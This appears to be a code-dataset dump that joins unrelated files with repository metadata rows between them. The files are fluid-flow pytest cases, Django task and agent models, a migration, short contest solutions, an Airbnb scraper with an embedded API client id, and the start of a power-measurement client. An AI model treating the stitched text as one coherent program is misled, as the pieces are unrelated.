        (dict(P1=1E5, P2=1E6, T1=300, k=1.4, eta=1), 8125.161295388634),
        (dict(P1=1E5, P2=1E6, T1=300, k=1.4, eta=0.78), 10416.873455626454),
        (dict(P1=1E5, P2=1E6, T1=300, k=1.4, eta=0.78, Z=0.9), 9375.186110063809),
    ]
    for kwargs, expected in cases:
        assert_close(isentropic_work_compression(**kwargs), expected, rtol=1e-05)

    # Inverse problems: recover P1, P2 and eta from the real-gas work above.
    base = dict(W=9375.186110063809, T1=300, k=1.4, Z=0.9)
    assert_close(isentropic_work_compression(P2=1E6, eta=0.78, **base), 1E5, rtol=1E-5)
    assert_close(isentropic_work_compression(P1=1E5, eta=0.78, **base), 1E6, rtol=1E-5)
    assert_close(isentropic_work_compression(P1=1E5, P2=1E6, eta=None, **base), 0.78, rtol=1E-5)

    # Missing T1 leaves the problem underspecified and must raise.
    with pytest.raises(Exception):
        isentropic_work_compression(P1=1E5, P2=1E6, k=1.4, T1=None)
def test_isentropic_T_rise_compression():
    # Outlet temperature for an ideal and for a 78%-efficient compression.
    assert_close(isentropic_T_rise_compression(286.8, 54050, 432400, 1.4),
                 519.5230938217768, rtol=1e-05)
    assert_close(isentropic_T_rise_compression(286.8, 54050, 432400, 1.4, eta=0.78),
                 585.1629407971498, rtol=1e-05)
    # The eta=1 result must equal the textbook relation T2 = T1*(P2/P1)**((k-1)/k).
    ideal = 286.8*(432400/54050)**((1.4 - 1)/1.4)
    assert_close(ideal, 519.5230938217768, rtol=1e-05)
def test_isentropic_efficiency():
    # Round trip between isentropic and polytropic efficiency at a 10:1 ratio.
    eta_s = isentropic_efficiency(1E5, 1E6, 1.4, eta_p=0.78)
    assert_close(eta_s, 0.7027614191263858)
    assert_close(isentropic_efficiency(1E5, 1E6, 1.4, eta_s=0.7027614191263858), 0.78)

    # Neither efficiency supplied -> underspecified, must raise.
    with pytest.raises(Exception):
        isentropic_efficiency(1E5, 1E6, 1.4)

    # Example 7.6 of the reference: round trip at a 3:1 pressure ratio.
    eta_s = isentropic_efficiency(1E5, 3E5, 1.4, eta_p=0.75)
    assert_close(eta_s, 0.7095085923615653)
    assert_close(isentropic_efficiency(1E5, 3E5, 1.4, eta_s=eta_s), 0.75)
def test_polytropic_exponent():
    # n <-> eta_p round trip for k = 1.4.
    n = polytropic_exponent(1.4, eta_p=0.78)
    assert_close(n, 1.5780346820809246)
    assert_close(polytropic_exponent(1.4, n=1.5780346820809246), 0.78)
    # Either n or eta_p must be given.
    with pytest.raises(Exception):
        polytropic_exponent(1.4)
def test_compressible():
    # Critical-flow temperature and pressure.
    assert_close(T_critical_flow(473, 1.289), 413.2809086937528)
    assert_close(P_critical_flow(1400000, 1.289), 766812.9022792266)
    # Flow is critical only when the downstream pressure is low enough.
    assert is_critical_flow(670E3, 101E3, 1.11)
    assert not is_critical_flow(670E3, 532E3, 1.11)
    # Stagnation quantities.
    assert_close(stagnation_energy(125), 7812.5)
    assert_close(P_stagnation(54050., 255.7, 286.8, 1.4), 80772.80495900588)
    assert_close(T_stagnation(286.8, 54050, 54050*8, 1.4), 519.5230938217768)
    assert_close(T_stagnation_ideal(255.7, 250, 1005.), 286.79452736318405)
def test_Panhandle_A():
    # Example 7-18 Gas of Crane TP 410M
    known = dict(D=0.340, P1=90E5, P2=20E5, L=160E3, SG=0.693,
                 Tavg=277.15, Q=42.56082051195928)
    # Leave each quantity out in turn and check it is recovered from the rest.
    for unknown in ('Q', 'P1', 'P2', 'L', 'D'):
        given = {k: v for k, v in known.items() if k != unknown}
        assert_close(Panhandle_A(**given), known[unknown])
    # Two unknowns at once -> underspecified, must raise.
    with pytest.raises(Exception):
        Panhandle_A(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Panhandle_B():
    # Example 7-18 Gas of Crane TP 410M
    known = dict(D=0.340, P1=90E5, P2=20E5, L=160E3, SG=0.693,
                 Tavg=277.15, Q=42.35366178004172)
    # Leave each quantity out in turn and check it is recovered from the rest.
    for unknown in ('Q', 'P1', 'P2', 'L', 'D'):
        given = {k: v for k, v in known.items() if k != unknown}
        assert_close(Panhandle_B(**given), known[unknown])
    # Two unknowns at once -> underspecified, must raise.
    with pytest.raises(Exception):
        Panhandle_B(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Weymouth():
    # Same Crane TP 410M pipeline as the Panhandle tests.
    known = dict(D=0.340, P1=90E5, P2=20E5, L=160E3, SG=0.693,
                 Tavg=277.15, Q=32.07729055913029)
    # Leave each quantity out in turn and check it is recovered from the rest.
    for unknown in ('Q', 'P1', 'P2', 'L', 'D'):
        given = {k: v for k, v in known.items() if k != unknown}
        assert_close(Weymouth(**given), known[unknown])
    # Two unknowns at once -> underspecified, must raise.
    with pytest.raises(Exception):
        Weymouth(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Spitzglass_high():
    # High-pressure Spitzglass form on the Crane TP 410M pipeline.
    known = dict(D=0.340, P1=90E5, P2=20E5, L=160E3, SG=0.693,
                 Tavg=277.15, Q=29.42670246281681)
    # Leave each quantity out in turn and check it is recovered from the rest.
    for unknown in ('Q', 'P1', 'P2', 'L', 'D'):
        given = {k: v for k, v in known.items() if k != unknown}
        assert_close(Spitzglass_high(**given), known[unknown])
    # Two unknowns at once -> underspecified, must raise.
    with pytest.raises(Exception):
        Spitzglass_high(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Spitzglass_low():
    # Low-pressure Spitzglass form; note the outlet is at gauge zero.
    known = dict(D=0.154051, P1=6720.3199, P2=0, L=54.864, SG=0.6,
                 Tavg=288.7, Q=0.9488775242530617)
    for unknown in ('Q', 'P1', 'P2', 'L', 'D'):
        given = {k: v for k, v in known.items() if k != unknown}
        # P2 is exactly 0 here, so an absolute tolerance is required for it.
        tol = dict(atol=1E-10) if unknown == 'P2' else {}
        assert_close(Spitzglass_low(**given), known[unknown], **tol)
    # Two unknowns at once -> underspecified, must raise.
    with pytest.raises(Exception):
        Spitzglass_low(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Oliphant():
    # Oliphant correlation on the Crane TP 410M pipeline.
    known = dict(D=0.340, P1=90E5, P2=20E5, L=160E3, SG=0.693,
                 Tavg=277.15, Q=28.851535408143057)
    # Leave each quantity out in turn and check it is recovered from the rest.
    for unknown in ('Q', 'P1', 'P2', 'L', 'D'):
        given = {k: v for k, v in known.items() if k != unknown}
        assert_close(Oliphant(**given), known[unknown])
    # Two unknowns at once -> underspecified, must raise.
    with pytest.raises(Exception):
        Oliphant(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Fritzsche():
    # Fritzsche correlation on the Crane TP 410M pipeline.
    known = dict(D=0.340, P1=90E5, P2=20E5, L=160E3, SG=0.693,
                 Tavg=277.15, Q=39.421535157535565)
    # Leave each quantity out in turn and check it is recovered from the rest.
    for unknown in ('Q', 'P1', 'P2', 'L', 'D'):
        given = {k: v for k, v in known.items() if k != unknown}
        assert_close(Fritzsche(**given), known[unknown])
    # Two unknowns at once -> underspecified, must raise.
    with pytest.raises(Exception):
        Fritzsche(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Muller():
    """Muller equation (includes viscosity): forward flow solve, then
    back-solve each remaining unknown given the flow rate."""
    known = {'D': 0.340, 'mu': 1E-5, 'P1': 90E5, 'P2': 20E5,
             'L': 160E3, 'SG': 0.693, 'Tavg': 277.15}
    flow = 60.45796698148663
    # Forward solve for the volumetric flow rate.
    assert_close(Muller(**known), flow)
    # Back-solve each of P1, P2, L, D from the other knowns plus Q.
    for unknown in ('P1', 'P2', 'L', 'D'):
        given = {k: v for k, v in known.items() if k != unknown}
        assert_close(Muller(Q=flow, **given), known[unknown])
    # Omitting both P1 and Q underspecifies the system and must raise.
    with pytest.raises(Exception):
        Muller(**{k: v for k, v in known.items() if k != 'P1'})
def test_IGT():
    """IGT equation (includes viscosity): forward flow solve, then
    back-solve each remaining unknown given the flow rate."""
    known = {'D': 0.340, 'mu': 1E-5, 'P1': 90E5, 'P2': 20E5,
             'L': 160E3, 'SG': 0.693, 'Tavg': 277.15}
    flow = 48.92351786788815
    # Forward solve for the volumetric flow rate.
    assert_close(IGT(**known), flow)
    # Back-solve each of P1, P2, L, D from the other knowns plus Q.
    for unknown in ('P1', 'P2', 'L', 'D'):
        given = {k: v for k, v in known.items() if k != unknown}
        assert_close(IGT(Q=flow, **given), known[unknown])
    # Omitting both P1 and Q underspecifies the system and must raise.
    with pytest.raises(Exception):
        IGT(**{k: v for k, v in known.items() if k != 'P1'})
def test_isothermal_gas():
    """Exercise isothermal_gas: solve for each variable, argument
    validation, the choked-flow limit, and the ideal-gas closed form."""
    # Solve for mass flow, then back-solve L, P1, P2 and D from it.
    mcalc = isothermal_gas(11.3, 0.00185, P1=1E6, P2=9E5, L=1000, D=0.5)
    assert_close(mcalc, 145.484757264)
    assert_close(isothermal_gas(11.3, 0.00185, P1=1E6, P2=9E5, m=145.484757264, D=0.5), 1000)
    assert_close(isothermal_gas(11.3, 0.00185, P2=9E5, m=145.484757264, L=1000., D=0.5), 1E6)
    assert_close(isothermal_gas(11.3, 0.00185, P1=1E6, m=145.484757264, L=1000., D=0.5), 9E5)
    assert_close(isothermal_gas(11.3, 0.00185, P1=1E6, P2=9E5, m=145.484757264, L=1000.), 0.5)
    # Underspecified call: no diameter and no mass flow given.
    with pytest.raises(Exception):
        isothermal_gas(11.3, 0.00185, P1=1E6, P2=9E5, L=1000)
    # Pressure ratio beyond the choked limit must raise.
    with pytest.raises(Exception):
        isothermal_gas(rho=11.3, fd=0.00185, P1=1E6, P2=1E5, L=1000, D=0.5)
    # Reversed pressures (P2 > P1) must raise.
    with pytest.raises(Exception):
        isothermal_gas(rho=11.3, fd=0.00185, P2=1E6, P1=9E5, L=1000, D=0.5)
    # Newton can't converge, need a bounded solver
    P1 = isothermal_gas(rho=11.3, fd=0.00185, m=390, P2=9E5, L=1000, D=0.5)
    assert_close(P1, 2298973.786533209)
    # Case where the desired flow is greater than the choked flow's rate
    with pytest.raises(Exception):
        isothermal_gas(rho=11.3, fd=0.00185, m=400, P2=9E5, L=1000, D=0.5)
    # test the case where the ideal gas assumption is baked in:
    rho = 10.75342009105268 # Chemical('nitrogen', P=(1E6+9E5)/2).rho
    m1 = isothermal_gas(rho=rho, fd=0.00185, P1=1E6, P2=9E5, L=1000, D=0.5)
    assert_close(m1, 141.92260633059334)
    # They are fairly similar: compare against the closed-form ideal-gas
    # isothermal flow equation evaluated directly below.
    from math import log, pi
    fd = 0.00185
    P1 = 1E6
    P2 = 9E5
    L = 1000
    D = 0.5
    T = 298.15
    # from scipy.constants import R
    # from thermo import property_molar_to_mass, Chemical, pi, log
    R = 296.8029514446658 # property_molar_to_mass(R, Chemical('nitrogen').MW)
    m2 = (pi**2/16*D**4/(R*T*(fd*L/D + 2*log(P1/P2)))*(P1**2-P2**2))**0.5
    assert_close(m2, 145.48786057477403)
def test_P_isothermal_critical_flow():
    """Check the critical (choked) outlet pressure for isothermal gas flow."""
    # Outlet pressure below this value chokes the flow for this pipe.
    P2_max = P_isothermal_critical_flow(P=1E6, fd=0.00185, L=1000., D=0.5)
    assert_close(P2_max, 389699.7317645518)
"Caleb.Andrew.Bell@gmail.com"
] | Caleb.Andrew.Bell@gmail.com |
8c1b72abd6090fc6d7b1f0f79362a9bd829c531a | c0b02bf77168b5770a86e8beb341738083a253a7 | /api_server/master_server/models.py | 3e9e65f3860d1b2d1fdda575e4607778aa2af3b5 | [] | no_license | nhoss2/pymada | 61fe4df9c107b66df14bf1384716f370e6d23102 | ec537e938a593e830ca82249b82531a881430dd5 | refs/heads/master | 2022-12-13T20:44:09.745576 | 2020-05-27T17:05:46 | 2020-05-27T17:05:46 | 204,399,744 | 0 | 1 | null | 2022-12-08T09:31:54 | 2019-08-26T05:06:07 | Python | UTF-8 | Python | false | false | 2,034 | py | from django.db import models
class UrlTask(models.Model):
    """A single URL to be processed, with its lifecycle state
    (QUEUED -> ASSIGNED -> COMPLETE) and timing/failure bookkeeping."""
    # (stored value, display label) choices for task_state.
    task_states = (
        ('QUEUED', 'QUEUED'),
        ('ASSIGNED', 'ASSIGNED'),
        ('COMPLETE', 'COMPLETE')
    )
    url = models.TextField()  # the URL to process
    json_metadata = models.TextField(null=True)  # optional task metadata (JSON text)
    task_result = models.TextField(null=True)  # result payload, set when complete
    task_state = models.CharField(choices=task_states, max_length=10, default='QUEUED')
    assigned_agent = models.ForeignKey('Agent', on_delete=models.CASCADE, null=True)
    fail_num = models.IntegerField(default=0)  # count of failed attempts
    start_time = models.FloatField(default=0)  # presumably epoch seconds; 0 = not started — TODO confirm
    end_time = models.FloatField(default=0)  # presumably epoch seconds; 0 = not finished — TODO confirm
class Agent(models.Model):
    """A worker agent known to the master server, with its contact
    details and current runtime state."""
    # (stored value, display label) choices for agent_state.
    agent_states = (
        ('IDLE', 'IDLE'),
        ('RUNNING', 'RUNNING'),
        ('ASSIGNED', 'ASSIGNED'), # assigned task
        ('LOST', 'LOST'),
        ('NO_RUNNER', 'NO_RUNNER')
    )
    hostname = models.TextField()
    agent_state = models.CharField(choices=agent_states, max_length=10, default='NO_RUNNER')
    last_contact_attempt = models.IntegerField()  # presumably an epoch timestamp — TODO confirm
    agent_url = models.CharField(max_length=300)  # URL used to reach the agent
    runner_num = models.IntegerField(null=True)
    assigned_task = models.ForeignKey('UrlTask', on_delete=models.CASCADE, null=True)
class Runner(models.Model):
    """Source and metadata of a runner program distributed to agents."""
    contents = models.TextField()  # runner source / file contents
    file_name = models.CharField(max_length=200)
    file_type = models.CharField(max_length=200) # used by agent_server, must be exact match from agent_server.py
    custom_executable = models.CharField(max_length=200, null=True)  # optional executable override
    dependency_file = models.TextField(null=True)  # optional dependency listing
class ErrorLog(models.Model):
    """An error message, optionally tied to the agent and runner involved."""
    message = models.TextField()
    reporting_agent = models.ForeignKey('Agent', on_delete=models.CASCADE, null=True)
    runner = models.ForeignKey('Runner', on_delete=models.CASCADE, null=True)
    timestamp = models.DateTimeField(auto_now_add=True)  # set once on insert
class Screenshot(models.Model):
    """A screenshot image, optionally associated with a URL task."""
    task = models.ForeignKey('UrlTask', on_delete=models.CASCADE, null=True)
    timestamp = models.DateTimeField(auto_now_add=True)  # set once on insert
    screenshot = models.ImageField()
| [
"nafis@labs.im"
] | nafis@labs.im |
bbefec74ec05c8be2358eb6d37693b79a119f68a | a4830a0189c325c35c9021479a5958ec870a2e8b | /routing/migrations/0022_auto_20160819_1523.py | 9a72cd9f00d71edcf95d1e679496d2ced9546eee | [] | no_license | solutionprovider9174/steward | 044c7d299a625108824c854839ac41f51d2ca3fd | fd681593a9d2d339aab0f6f3688412d71cd2ae32 | refs/heads/master | 2022-12-11T06:45:04.544838 | 2020-08-21T02:56:55 | 2020-08-21T02:56:55 | 289,162,699 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 887 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-08-19 15:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration (2016-08-19): adds default ordering by
    `number` and tightens the history number field's validator."""
    dependencies = [
        ('routing', '0021_fraudbypasshistory_outboundroutehistory'),
    ]
    operations = [
        # Default queryset ordering by phone number.
        migrations.AlterModelOptions(
            name='fraudbypass',
            options={'ordering': ('number',)},
        ),
        migrations.AlterModelOptions(
            name='outboundroute',
            options={'ordering': ('number',)},
        ),
        # Require exactly 10 digits for historical fraud-bypass numbers.
        migrations.AlterField(
            model_name='fraudbypasshistory',
            name='number',
            field=models.CharField(max_length=64, validators=[django.core.validators.RegexValidator(code='nomatch', message='Must be 10 digits', regex='^\\d{10}$')]),
        ),
    ]
| [
"guangchengwang9174@yandex.com"
] | guangchengwang9174@yandex.com |
681d7bd02ccb0578a7842aa55f7bc5a99400f534 | 0859a864b1270164fe44a878ab12cfb3302c36bf | /abc159/a.py | fe00ff3096ace83f6c7f54a99fa07d13cf37865b | [] | no_license | wataoka/atcoder | f359d49ab6e0db39c019d9f6d2e8b92d35f723c4 | b91465dd5f655d05b89485fc7ad222283c5958f5 | refs/heads/master | 2021-04-15T06:02:59.593965 | 2020-05-11T04:38:23 | 2020-05-11T04:38:23 | 126,754,342 | 0 | 0 | null | 2020-02-28T02:31:03 | 2018-03-26T00:51:12 | Python | UTF-8 | Python | false | false | 106 | py | def rC2(r):
return int(r*(r-1)//2)
N, M = list(map(int, input().split()))
print(rC2(r=N) + rC2(r=M)) | [
"wataoka@stu.kobe-u.ac.jp"
] | wataoka@stu.kobe-u.ac.jp |
96488cf113baf9488bed5f39de99090512a92017 | e1d9187552b25ef8835d1c5219e35edc7d6c1139 | /price_parcer.py | b2ccb7075fc975bfc1fb519c8c6c5700faf46a16 | [] | no_license | iamishalkin/airbnb | 63b6338cdb323ebc2b6bf4a535e9c36258ff7b4c | 40bea3547f1c7a281b39345f7dcb1e2a7d75171f | refs/heads/master | 2021-01-19T20:29:49.373930 | 2020-04-14T09:47:16 | 2020-04-14T09:47:16 | 88,510,755 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,983 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 13 11:26:47 2017
@author: ivan
"""
import requests
import json
import pandas as pd
# Airbnb mobile-API search endpoint with a public client id baked in;
# per-request parameters (offset, location, price band) are appended later.
BASE='https://api.airbnb.com/v2/search_results?client_id=3092nxybyb0otqw18e8nh5nty&_limit=18&sort=1&locale=ru-RU'
# Price-band edges; consecutive pairs form the [price_min, price_max]
# search buckets so that no single query hits the API's result cap.
price_range=[300,400,500,600,700,800,900,950,1000,1050,1100,
             1150,1200,1250,1300,1350,1400,1450,1500,1550,1600,
             1650,1700,1750,1800,1850,1900,1950,2000,2100,2200,
             2300,2400,2500,2600,2700,2800,2900,3000,3100,3200,
             3300,3400,3500,3600,3700,4000,5000,6000,7000,8000,
             13000,15000]
# Main interactive loop: for each city the user enters, sweep the price
# buckets, collect every listing plus its reviews, and dump both to CSV.
while True:
    city = input('Введите город, как в airbnb (Samara--Samara-Oblast--Russia): ')
    # Short name (text before the first '--') keys the output file names.
    # Fall back to the full string when there is no '--' separator; the old
    # slice city[0:city.find('--')] silently dropped the last character
    # (find() == -1) in that case.
    separator = city.find('--')
    city_short = city[:separator] if separator != -1 else city
    APARTMENTS = []  # per-listing dicts; converted to a DataFrame/CSV below
    REVIEWS = []     # per-review dicts for the same listings
    # Iterate consecutive (min, max) pairs of price_range.
    for price_min, price_max in zip(price_range, price_range[1:]):
        print(price_min, price_max)
        for page in range(20):  # paginate: 50 results per page, max 20 pages
            url = (BASE + '&_offset=' + str(page*50) + '&location=' + city
                   + '&_limit=50' + '&price_min=' + str(price_min)
                   + '&price_max=' + str(price_max))
            jsonpage = json.loads(requests.get(url).text)
            # Treat a missing key the same as an empty page (the old
            # `== []` check crashed on None).
            observ = jsonpage.get('search_results') or []
            if not observ:
                break  # no more results in this price bucket
            for result in observ:
                idf = result.get('listing')  # summary record from search
                # Fetch the full listing record for the detailed fields.
                listing_url = ('https://api.airbnb.com/v2/listings/' + str(idf.get('id'))
                               + '?client_id=3092nxybyb0otqw18e8nh5nty'
                               + '&_format=v1_legacy_for_p3&locale=ru-RU')
                listing_jsonpage = json.loads(requests.get(listing_url).text)
                ftrs = listing_jsonpage.get('listing')
                # amenities_ids may be missing; default to [] so the
                # `id in amen` flags below simply become False.
                amen = ftrs.get('amenities_ids') or []
                APARTMENTS.append({
                    "apart_id": idf.get('id'),
                    'apart_name': ftrs.get('name'),
                    # Fixed: this key used to be 'description', which was a
                    # duplicate of the 'description' key below, so the
                    # summary value was silently discarded.
                    'summary': ftrs.get('summary'),
                    'bathrooms': ftrs.get('bathrooms'),
                    'bed_type': ftrs.get('bed_type'),  # see also 'bed_type_category'
                    'bedrooms': ftrs.get('bedrooms'),
                    'beds': ftrs.get('beds'),
                    'cancellation_policy': ftrs.get('cancellation_policy'),
                    'city': ftrs.get('city'),
                    'cleaning_fee_native': ftrs.get('cleaning_fee_native'),
                    'country': ftrs.get('country'),  # fixed typo: was .get('counntry'), always None
                    'description': ftrs.get('description'),
                    'extra_user_info': ftrs.get('extra_user_info'),
                    'extra_price_native': ftrs.get('extra_price_native'),
                    'guests_included': ftrs.get('guests_included'),
                    'has_agreed_to_legal_terms': ftrs.get('has_agreed_to_legal_terms'),
                    # NOTE(review): assumes 'hosts' is a non-empty list — confirm
                    'host_id': ftrs.get('hosts')[0].get('id'),
                    'house_rules': ftrs.get('house_rules'),
                    'in_building': ftrs.get('in_building'),
                    'instant_bookable': ftrs.get('instant_bookable'),
                    'interaction': ftrs.get('interaction'),  # host interaction notes
                    'is_location_exact': ftrs.get('is_location_exact'),
                    'lat': ftrs.get('lat'),
                    'lng': ftrs.get('lng'),
                    'max_nights': ftrs.get('max_nights'),
                    'min_nights': ftrs.get('min_nights'),
                    'monthly_price_factor': ftrs.get('monthly_price_factor'),
                    'native_currency': ftrs.get('native_currency'),
                    'neighborhood': ftrs.get('neighborhood'),
                    # TODO confirm: probably meant ftrs.get('neighborhood_overview')
                    'neighborhood_overview': ftrs.get('neighborhood'),
                    'notes': ftrs.get('notes'),
                    # TODO confirm field name: 'medium-url' may be 'medium_url' in the API
                    'photo_url': ftrs.get('medium-url'),
                    'picture_count': ftrs.get('picture_count'),
                    'price_native': ftrs.get('price_native'),
                    'price_for_extra_person_native': ftrs.get('price_for_extra_person_native'),
                    'property_type': ftrs.get('property_type'),
                    'require_guest_phone_verification': ftrs.get('require_guest_phone_verification'),
                    'review_rating_accuracy': ftrs.get('review_rating_accuracy'),
                    'review_rating_checkin': ftrs.get('review_rating_checkin'),
                    'review_rating_cleanliness': ftrs.get('review_rating_cleanliness'),
                    'review_rating_communication': ftrs.get('review_rating_communication'),
                    'review_rating_location': ftrs.get('review_rating_location'),
                    'review_rating_value': ftrs.get('review_rating_value'),
                    'reviews_count': ftrs.get('reviews_count'),
                    'room_type': ftrs.get('room_type'),
                    'room_type_category': ftrs.get('room_type_category'),
                    'space': ftrs.get('space'),
                    'square_feet': ftrs.get('square_feet'),
                    'star_rating': ftrs.get('star_rating'),
                    'transit': ftrs.get('transit'),
                    'weekly_price_factor': ftrs.get('weekly_price_factor'),
                    # Amenity flags: True when the amenity id is listed.
                    "Kitchen": 8 in amen,
                    "Internet": 3 in amen,
                    "TV": 1 in amen,
                    "Essentials": 40 in amen,
                    "Shampoo": 41 in amen,
                    "Heating": 30 in amen,
                    "Air_conditioning": 5 in amen,
                    "Washer": 33 in amen,
                    "Dryer": 34 in amen,
                    "Free_parking_on_premises": 9 in amen,
                    "Free_parking_on_street": 23 in amen,
                    "Paid_parking_off_premises": 10 in amen,
                    "Wireless_Internet": 4 in amen,
                    "Cable_TV": 2 in amen,
                    "Breakfast": 16 in amen,
                    "Pets_allowed": 12 in amen,
                    "Family_kid_friendly": 31 in amen,
                    "Suitable_for_events": 32 in amen,
                    "Smoking_allowed": 11 in amen,
                    "Wheelchair_accessible": 6 in amen,
                    "Elevator_in_building": 21 in amen,
                    "Indoor_fireplace": 27 in amen,
                    "Buzzer_wireless_intercom": 28 in amen,
                    "Doorman": 14 in amen,
                    "Pool": 7 in amen,
                    "Hot_tub": 25 in amen,
                    "Gym": 15 in amen,
                    "Hangers": 44 in amen,
                    "Iron": 46 in amen,
                    "Hair_dryer": 45 in amen,
                    "Laptop_friendly_workspace": 47 in amen,
                    "Smoke_detector": 35 in amen,
                    "Carbon_monoxide_detector": 36 in amen,
                    "First_aid_kit": 37 in amen,
                    "Safety_card": 38 in amen,
                    "Fire_extinguisher": 39 in amen,
                    "Lock_on_bedroom_door": 42 in amen,
                    "Self_Check_In": 51 in amen,
                    'url': 'https://www.airbnb.com/rooms/' + str(idf.get('id'))
                })
                if ftrs.get('reviews_count') == 0:
                    continue  # nothing to fetch for this listing
                print('listing has some reviews')
                revurl = ('https://api.airbnb.com/v2/reviews?client_id=3092nxybyb0otqw18e8nh5nty'
                          + '&listing_id=' + str(idf.get('id')) + '&role=all')
                json_review_page = json.loads(requests.get(revurl).text)
                revs = json_review_page.get('reviews') or []
                for revdict in revs:
                    REVIEWS.append({
                        'apart_id': idf.get('id'),
                        'author_id': revdict.get('author_id'),
                        'date': revdict.get('created_at'),
                        'review': revdict.get('comments')
                    })
    # Persist both tables, keyed by the short city name.
    fd = pd.DataFrame(REVIEWS)
    fd.to_csv('reviews/Review_' + city_short + '.csv', header=True, index=False, encoding='utf-8')
    df = pd.DataFrame(APARTMENTS)
    df.to_csv('apartments/' + city_short + '.csv', header=True, index=False, encoding='utf-8')
    print(city_short, ' collected')
| [
"noreply@github.com"
] | iamishalkin.noreply@github.com |
9434fd3c1d1715f323f8d9c6fc8f1097ccd9a93e | 0cdcee391e178092d7073734957075c72681f037 | /hackerrank/si/si-smaller-element-left-side.py | 10a600c468bd60c31b9b74c6e23fe144363e00bf | [] | no_license | hrishikeshtak/Coding_Practises_Solutions | 6b483bbf19d5365e18f4ea1134aa633ff347a1c1 | 86875d7436a78420591a60b716acd2780287b4a8 | refs/heads/master | 2022-10-06T18:44:56.992451 | 2022-09-25T03:29:03 | 2022-09-25T03:29:03 | 125,744,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 903 | py | #!/usr/bin/python3
# Find, for each array element, the nearest strictly smaller element on its left side
class Solution:
    # @param arr : list of integers
    # @return a list of integers
    def prevSmaller(self, arr):
        """Return, for each element of *arr*, the nearest strictly smaller
        value to its left, or -1 when no such value exists.

        Uses a monotonically increasing stack of candidate values, giving
        O(n) time and O(n) space.  Unlike the original fixed-array stack,
        this also handles an empty input list (which previously raised
        IndexError) and reads more idiomatically.
        """
        result = []
        stack = []  # values with no smaller value between them and the cursor
        for value in arr:
            # Values >= the current one can never be the "previous smaller"
            # answer for this or any later element, so discard them.
            while stack and stack[-1] >= value:
                stack.pop()
            result.append(stack[-1] if stack else -1)
            stack.append(value)
        return result
if __name__ == '__main__':
    # Earlier sample inputs tried here: [4, 5, 2, 10, 8] and [3, 2, 1];
    # only the last assignment was ever used, so keep just that one.
    sample = [39, 27, 11, 4, 24, 32, 32, 1]
    print(Solution().prevSmaller(sample))
| [
"hrishikesh.tak@oneconvergence.com"
] | hrishikesh.tak@oneconvergence.com |
588bbf7a72dd67ac3e076650b05aeb73ce05b950 | b1a48bc7b2ce2aa1f400382f2a275a384e8be2a2 | /ptd_client_server/client.py | bab3221d4ab0ae73715cb6085761c43a2488f8a8 | [
"Apache-2.0"
] | permissive | xzfc/mlcommons-power | d281b654591ee203b27444ee5a3b37a20c0b5530 | af35f05f8e17d9f3ba15385ea622c6afbb66799d | refs/heads/master | 2023-02-24T03:55:31.833505 | 2020-12-18T09:34:56 | 2020-12-18T09:34:56 | 320,599,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,263 | py | #!/usr/bin/env python3
# Copyright 2018 The MLPerf Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import argparse
import base64
import json
import logging
import os
import socket
import subprocess
import time
import lib
def command(server: "lib.Proto", command: str, check: bool = False) -> str:
    """Send *command* to the server and return its response.

    Both the outgoing command and the incoming response are logged.
    When *check* is True, any response other than "OK" is fatal: the
    error is logged and the process exits with status 1.

    Returning the response is new but backward-compatible: all existing
    callers ignored the previous implicit None.
    """
    logging.info(f"Sending command to the server: {command!r}")
    response = server.command(command)
    logging.info(f"Got response: {response!r}")
    if check and response != "OK":
        # Fixed message grammar: was "unexpecting".
        logging.fatal("Got an unexpected response from the server")
        exit(1)
    return response
lib.init("client")
parser = argparse.ArgumentParser(description="PTD client")
# fmt: off
parser.add_argument(
"-c", "--config", metavar="FILE", type=str,
help="""
Client configuration file path.
Note that the same options could be configured through the command line.
""")
parser.add_argument(
"-p", "--serverPort", metavar="PORT", type=int, default=4950,
help="Server port")
parser.add_argument(
"-i", "--serverIpAddress", metavar="ADDR", type=str, required=True,
help="Server IP address")
parser.add_argument(
"-o", "--output", metavar="DIR", type=str, default="out",
help="Output directory")
parser.add_argument(
"--ntp-command", metavar="CMD", type=str,
help="""A command to run after connecting to the server.""")
parser.add_argument(
"--run-before", metavar="CMD", type=str,
help="""
A command to run before power measurement.
Some preparation could be done here, if necessary.
""")
parser.add_argument(
"--run-workload", metavar="CMD", type=str,
help="""
A command to run under power measurement.
An actual workload should be done here.
""")
parser.add_argument(
"--run-after", metavar="CMD", type=str,
help="""
A command to run after power measurement is done.
A cleanup or some log processing could be done here, if necessary.
""")
# fmt: on
args = parser.parse_args()
# Load the optional JSON config file; explicit command-line flags win.
if args.config is not None:
    with open(args.config, "r") as f:
        config = json.load(f)
else:
    config = {}
# Fill in each unset CLI option from the config file (camelCase keys).
if args.run_before is None:
    args.run_before = config.get("runBefore", "")
if args.run_workload is None:
    args.run_workload = config.get("runWorkload", None)
if args.run_workload is None:
    # Still unset after checking both sources: there is nothing to measure.
    logging.fatal("--run-workload option is mandatory")
    exit(1)
if args.run_after is None:
    args.run_after = config.get("runAfter", "")
if args.ntp_command is None:
    args.ntp_command = config.get("ntpCommand", "")
# Refuse to overwrite results from a previous run.
if os.path.exists(args.output):
    logging.fatal(f"The output directory {args.output!r} already exists.")
    logging.fatal("Please remove it or select another directory.")
